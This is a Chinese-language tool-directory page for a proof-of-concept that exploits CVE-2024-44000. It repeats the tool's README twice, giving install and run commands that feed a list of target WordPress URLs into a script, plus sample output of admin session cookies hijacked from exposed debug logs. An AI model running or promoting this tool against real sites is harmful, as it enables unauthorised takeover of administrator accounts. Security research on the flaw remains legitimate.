Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-44000 — 是一款 PoC 工具,旨在利用 WordPress 站点不安全暴露的调试日志并提取会话 Cookie。 | Kitploit
工具/GitHubGitHub/geniuszly/cve-2024-44000
漏洞利用Web应用程序漏洞利用信息收集渗透测试红队
GitHubgeniuszly/cve-2024-44000

CVE-2024-44000

是一款 PoC 工具,旨在利用 WordPress 站点不安全暴露的调试日志并提取会话 Cookie。

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

EN

GenCookieSessionHijack 是一款 PoC 工具,旨在利用 WordPress 站点不安全暴露的调试日志来提取会话 Cookie。这使攻击者能够劫持活跃的管理员会话,并获得对 WordPress 管理后台的未授权访问。

功能特性

  • 从 WordPress 调试日志中提取 Cookie。
  • 识别并过滤会话 Cookie(例如 wordpress_logged_in)。
  • 自动尝试会话劫持以获取管理员访问权限。
  • 直接在浏览器中打开被劫持的管理员会话。

使用方法

安装

git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

运行工具

  1. 在文件中准备一份目标 WordPress URL 列表,每行一个(例如 list.txt)。
  2. 使用以下命令运行该工具:
python GenCookieSessionHijack.py -f list.txt -o result.txt

参数

  • -f, --file:包含 URL 列表的文件路径(默认:list.txt)。
  • -o, --output:用于保存结果的文件(默认:result.txt)。

示例

python GenCookieSessionHijack.py -f targets.txt -o output.txt

这将从 targets.txt 中读取 URL 列表,尝试提取并使用会话 Cookie,并将结果保存到 output.txt。

输出结果

如果会话劫持尝试成功,该工具将生成一个带有被劫持管理员会话 Cookie 的 URL,并直接在默认浏览器中打开它。

输出示例:

[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

法律声明

本工具仅供教育目的使用,不应被用于非法活动。作者对因使用本工具而造成的任何滥用或损害概不负责。

RU

GenCookieSessionHijack 是一款 PoC 脚本,用于利用 WordPress 站点上不安全暴露的调试日志来提取会话 Cookie。这使攻击者能够拦截管理员的活动会话,并获得对 WordPress 管理面板的未授权访问。

功能特性

  • 从 WordPress 调试日志中提取 Cookie。
  • 识别并过滤会话 Cookie(例如 wordpress_logged_in)。
  • 自动尝试捕获会话以访问管理后台。
  • 直接在浏览器中打开被捕获的管理员会话。

使用方法

安装

git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt

运行工具

  1. 准备一个包含目标 WordPress URL 列表的文件,每行一个(例如 list.txt)。
  2. 使用以下命令运行该工具:
python GenCookieSessionHijack.py -f list.txt -o result.txt

参数

  • -f, --file:URL 列表文件的路径(默认:list.txt)。
  • -o, --output:用于保存结果的文件(默认:result.txt)。

示例

python GenCookieSessionHijack.py -f targets.txt -o output.txt

这将从 targets.txt 中读取 URL 列表,尝试提取并使用会话 Cookie,并将结果保存到 output.txt。

输出结果

如果会话捕获尝试成功,该工具将生成一个带有被捕获管理员会话 Cookie 的 URL,并直接在浏览器中打开它。

输出示例:

[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
    wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456

[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie

[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404

免责声明

本工具仅供教育目的使用,不应被用于非法活动。作者对因使用本工具而造成的任何滥用或损害概不负责。

下载工具